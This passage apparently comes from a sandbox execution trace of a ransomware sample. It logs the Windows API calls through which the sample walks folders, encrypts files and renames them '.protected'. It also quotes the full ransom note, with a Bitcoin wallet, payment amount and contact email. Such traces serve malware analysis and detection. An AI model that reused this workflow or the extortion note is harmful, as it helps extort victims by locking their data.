(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.276] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.276] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.276] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0073.276] CloseHandle (hObject=0xa4) returned 1 [0073.277] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Windows") returned -1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files") returned -1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="System Volume Information") returned -1 [0073.277] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 82 [0073.277] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2=".") returned 1 [0073.277] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="..") returned 1 [0073.277] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned 84 [0073.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.277] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.277] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.277] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.277] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.277] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.277] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\.") returned 84 [0073.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.277] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.278] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.278] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.278] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.278] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.278] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\..") returned 85 [0073.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.278] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0073.278] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 91 [0073.278] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0073.278] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0073.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned 93 [0073.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0073.279] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.279] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.279] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.279] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.279] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\.") returned 93 [0073.279] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.279] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.279] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.279] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.279] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.279] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.279] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\..") returned 94 [0073.279] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.279] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.279] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0073.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 112 [0073.279] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0073.279] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned 114 [0073.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0073.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.280] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.280] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.280] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.280] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\.") returned 114 [0073.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.280] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.280] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.280] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.280] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.280] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.280] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\..") returned 115 [0073.280] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.280] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.280] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0073.280] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0073.280] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.280] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.280] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.281] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.281] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0073.281] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.281] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0073.281] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.281] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0073.281] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.326] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.326] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.329] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.329] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.456] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.516] CloseHandle (hObject=0xd8) returned 1 [0073.519] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 131 [0073.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.protected")) returned 1 [0073.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.520] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Windows") returned -1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files") returned 1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files (x86)") returned 1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$Recycle.bin") returned 1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="System Volume Information") returned 1 [0073.521] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.521] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".protected") returned 0x0 [0073.521] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0073.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.531] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.531] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0073.531] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.531] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".rar") returned 0x0 [0073.531] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.531] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".zip") returned 0x0 [0073.531] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.551] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.551] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.551] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.551] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.552] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.552] CloseHandle (hObject=0xd8) returned 1 [0073.552] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 148 [0073.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.protected")) returned 1 [0073.553] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.553] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.553] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 130 [0073.553] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.554] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.554] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.555] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.555] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.555] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.555] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0073.555] CloseHandle (hObject=0xd4) returned 1 [0073.556] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.556] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.556] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0073.556] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 